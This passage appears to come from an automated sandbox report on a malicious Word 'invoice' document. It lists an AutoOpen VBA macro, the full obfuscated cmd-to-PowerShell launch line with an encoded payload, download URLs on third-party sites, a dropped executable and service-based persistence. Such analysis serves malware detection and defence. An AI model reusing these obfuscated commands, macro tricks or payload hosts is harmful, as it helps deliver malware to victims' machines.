Source: OSPPSVC.EXE, 00000005.00000002.24909329903.011F0000.00000004.sdmpString found in binary or memory: http://go
Source: OSPPSVC.EXE, 00000005.00000002.24909329903.011F0000.00000004.sdmpString found in binary or memory: http://go.micro
Source: powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmpString found in binary or memory: http://java.com/
Source: powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmpString found in binary or memory: http://java.com/help
Source: powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmpString found in binary or memory: http://java.com/http://java.com/
Source: OSPPSVC.EXE, 00000005.00000002.24909329903.011F0000.00000004.sdmpString found in binary or memory: http://li
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmpString found in binary or memory: http://licensing.microsofH
Source: OSPPSVC.EXE, 00000005.00000002.24909329903.011F0000.00000004.sdmpString found in binary or memory: http://licensing.microsoft.
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmpString found in binary or memory: http://n
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmpString found in binary or memory: http://ns
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmpString found in binary or memory: http://ns.
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmpString found in binary or memory: http://ns:
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmpString found in binary or memory: http://nsj
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://pdesaa.cimaa.pt/zX7y/
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://sammykayfoundation.org/N2AW/
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://sammykayfoundation.org/N2AW/t
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe, 00000004.00000002.24435930466.01C65000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponse
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmpString found in binary or memory: http://www.D
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmpString found in binary or memory: http://www.micros
Source: WINWORD.EXE, 00000001.00000002.24914796217.03340000.00000004.sdmpString found in binary or memory: http://www.msnusers.comd
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmpString found in binary or memory: http://www.w3
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmpString found in binary or memory: http://wwwU
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://zadania.abel.b
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://zadania.abel.bielsko.pl/oL0VnrQ/
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\276299.exeJump to dropped file
Contains functionality to start windows servicesShow sources
Source: C:\Users\Public\276299.exeCode function: 7_2_003E9AA0 StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_003E9AA0

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\PartitionClu.exeExecutable created and started: C:\Windows\System32\PartitionClu.exe
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\276299.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\276299.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\Public\276299.exePE file moved: C:\Windows\System32\PartitionClu.exe

Data Obfuscation:

barindex
Document contains an embedded VBA with many randomly named variablesShow sources
Source: INVOICE-ZZIF-145448203429222.docStream path 'Macros/VBA/TGXYfVojZcFmAm' : High entropy of concatenated variable names
Source: INVOICE-ZZIF-145448203429222.docStream path 'Macros/VBA/knhJZowj' : High entropy of concatenated variable names
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAAJump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\System32\PartitionClu.exeCode function: 8_2_003E206F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,8_2_003E206F
Entry point lies outside standard sectionsShow sources
Source: initial sampleStatic PE information: section where entry point is pointing to: .rdata
PE file contains an invalid checksumShow sources
Source: 276299.exe.4.drStatic PE information: real checksum: 0x1000 should be: 0x21176
PE file contains sections with non-standard namesShow sources
Source: 276299.exe.4.drStatic PE information: section name: .CODE
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\Public\276299.exeCode function: 6_2_00421160 push ss; iretd 6_2_0042116D
Source: C:\Users\Public\276299.exeCode function: 7_2_003E1160 push ss; iretd 7_2_003E116D
Source: C:\Windows\System32\PartitionClu.exeCode function: 8_2_003E1160 push ss; iretd 8_2_003E116D
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E1160 push ss; iretd 9_2_003E116D

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

System Summary:

barindex
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: INVOICE-ZZIF-145448203429222.docOLE, VBA macro line: Sub AutoOpen()
Document contains an embedded VBA macro which may execute processesShow sources
Source: INVOICE-ZZIF-145448203429222.docOLE, VBA macro line: Application.Run "XdYnIfiqNSKFsn", cfipuRzErTzb
Source: INVOICE-ZZIF-145448203429222.docOLE, VBA macro line: CreateObject(diiXiviE).Run RzhXfzV + Chr(VBA.vbKeyC) + qwCZwGU + jsNYYhQzcFzVk + DKBElXs, vbHide
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: INVOICE-ZZIF-145448203429222.docOLE, VBA macro line: CreateObject(diiXiviE).Run RzhXfzV + Chr(VBA.vbKeyC) + qwCZwGU + jsNYYhQzcFzVk + DKBElXs, vbHide
Document contains an embedded VBA with hexadecimal encoded stringsShow sources
Source: INVOICE-ZZIF-145448203429222.docStream path 'Macros/VBA/knhJZowj' : found hex strings
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\Public\276299.exe 8B4474C158BA807B261CA28028FFE8549084577F9F02F9A8C757E03995C18D19
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 66.198.240.37 80
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\276299.exeJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 6337
Source: unknownProcess created: Commandline size = 5748
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Commandline size = 6337Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5748
Creates mutexesShow sources
Source: C:\Windows\System32\PartitionClu.exeMutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\Public\276299.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000
Source: C:\Users\Public\276299.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\PartitionClu.exeMutant created: \BaseNamedObjects\M14EB25D6
Source: C:\Users\Public\276299.exeMutant created: \Sessions\1\BaseNamedObjects\MB1508E3F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Detected potential crypto functionShow sources
Source: C:\Users\Public\276299.exeCode function: 6_2_00422F2A6_2_00422F2A
Source: C:\Users\Public\276299.exeCode function: 6_2_00422F2A6_2_00422F2A
Source: C:\Users\Public\276299.exeCode function: 7_2_003E2F2A7_2_003E2F2A
Source: C:\Users\Public\276299.exeCode function: 7_2_003E2F2A7_2_003E2F2A
Source: C:\Windows\System32\PartitionClu.exeCode function: 8_2_003E2F2A8_2_003E2F2A
Source: C:\Windows\System32\PartitionClu.exeCode function: 8_2_003E2F2A8_2_003E2F2A
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E2F2A9_2_003E2F2A
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E2F2A9_2_003E2F2A
Document contains embedded VBA macrosShow sources
Source: INVOICE-ZZIF-145448203429222.docOLE indicator, VBA macros: true
PE file contains executable resources (Code or Archives)Show sources
Source: 276299.exe.4.drStatic PE information: Resource name: RT_VERSION type: VAX COFF executable not stripped - version 79
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\PartitionClu.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\PartitionClu.exeFile read: C:\Windows\System32\drivers\etc\hosts
PE file contains an invalid data directoryShow sources
Source: 276299.exe.4.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x1fff address: 0x0
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.expl.troj.winDOC@13/8@2/6
Contains functionality to create servicesShow sources
Source: C:\Users\Public\276299.exeCode function: CreateServiceW,7_2_003E9908
Source: C:\Windows\System32\PartitionClu.exeCode function: CreateServiceW,9_2_003E9908
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\System32\PartitionClu.exeCode function: 8_2_003E220F CreateToolhelp32Snapshot,8_2_003E220F
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\Public\276299.exeCode function: 7_2_003E9A6A GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,7_2_003E9A6A
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$VOICE-ZZIF-145448203429222.docJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\SAMTAR~1\AppData\Local\Temp\CVRF490.tmpJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: INVOICE-ZZIF-145448203429222.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: INVOICE-ZZIF-145448203429222.docOLE document summary: edited time not present or 0
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: INVOICE-ZZIF-145448203429222.docvirustotal: Detection: 49%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\INVOICE-ZZIF-145448203429222.doc
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAANgA3ADUAMwAxADAAYwAwAGQANwA5ADkAOQA5AGQAZgA3AGIAMQBmAGEANQBiADIANgA0AGYAYwAzADEAMABiADIANQAwADUAZgAxADMAMwBlADgAMQBmADMANwA1AGIAZQBlADEAYgAyADgAOAA0ADEAOAA1AGQAYgAzADQAMAA3AGYANQAyAGYAOQA1ADgAMwBhADUANgA4AGIAMwA2ADMAYQA5ADYANABiADMANAA5ADcAMAA4ADIAYwA0AGQANQAxAGIAMQBhADUAYgAxAGEAYgBhAGQANwBhAGUAOAA5ADEAMwAwADkAOQA5ADQANABjADIAMwBiADQAYwAwADUAMQBlADAAOAA0AGMAYwA0ADgAOQBhAGIAYgBjADcAYgBjADIAOAA4ADcAMQBhAGUANAAyAGYAYwBjAGUAYgAxADIANgAyADcAMQA3AGUANAA5ADAAZAA0ADcAMABlADcAMgBkADkAYgBhADIANQBmADAAYgA4AGMANABiADMAOABmADEAOABlADQAMQAxAGQAZAAzAGQAZABjAGYAMQBiAGQ
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: unknownProcess created: C:\Users\Public\276299.exe 'C:\Users\Public\276299.exe'
Source: unknownProcess created: C:\Users\Public\276299.exe C:\Users\Public\276299.exe
Source: unknownProcess created: C:\Windows\System32\PartitionClu.exe C:\Windows\system32\PartitionClu.exe
Source: unknownProcess created: C:\Windows\System32\PartitionClu.exe C:\Windows\system32\PartitionClu.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAAJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAANgA3ADUAMwAxADAAYwAwAGQANwA5ADkAOQA5AGQAZgA3AGIAMQBmAGEANQBiADIANgA0AGYAYwAzADEAMABiADIANQAwADUAZgAxADMAMwBlADgAMQBmADMANwA1AGIAZQBlADEAYgAyADgAOAA0ADEAOAA1AGQAYgAzADQAMAA3AGYANQAyAGYAOQA1ADgAMwBhADUANgA4AGIAMwA2ADMAYQA5ADYANABiADMANAA5ADcAMAA4ADIAYwA0AGQANQAxAGIAMQBhADUAYgAxAGEAYgBhAGQANwBhAGUAOAA5ADEAMwAwADkAOQA5ADQANABjADIAMwBiADQAYwAwADUAMQBlADAAOAA0AGMAYwA0ADgAOQBhAGIAYgBjADcAYgBjADIAOAA4ADcAMQBhAGUANAAyAGYAYwBjAGUAYgAxADIANgAyADcAMQA3AGUANAA5ADAAZAA0ADcAMABlADcAMgBkADkAYgBhADIANQBmADAAYgA4AGMANABiADMAOABmADEAOABlADQAMQAxAGQAZAAzAGQAZABjAGYAMQBiAGQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\276299.exe 'C:\Users\Public\276299.exe'
Source: C:\Users\Public\276299.exeProcess created: C:\Users\Public\276299.exe C:\Users\Public\276299.exe
Source: C:\Windows\System32\PartitionClu.exeProcess created: C:\Windows\System32\PartitionClu.exe C:\Windows\system32\PartitionClu.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.24443785646.04070000.00000002.sdmp
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb* source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: ystem.pdbY source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: C:\Users\Public\276299.exeF\??\C:\Users\Public\276299.exepne.Identifiervapi32-l2-1-0.dllel-advapi32-l2-1-0.dllSystem.Management.Automation.pdbtion.ni.dll source: powershell.exe, 00000004.00000002.24428171411.00010000.00000004.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbpdb source: powershell.exe, 00000004.00000002.24435519402.01A3D000.00000004.sdmp
Document has a 'category' value indicative for goodwareShow sources
Source: INVOICE-ZZIF-145448203429222.docInitial sample: OLE document summary category = Gijoro
Document has a 'subject' value indicative for goodwareShow sources
Source: INVOICE-ZZIF-145448203429222.docInitial sample: OLE summary subject = Gijorore

HIPS / PFW / Operating System Protection Evasion:

barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
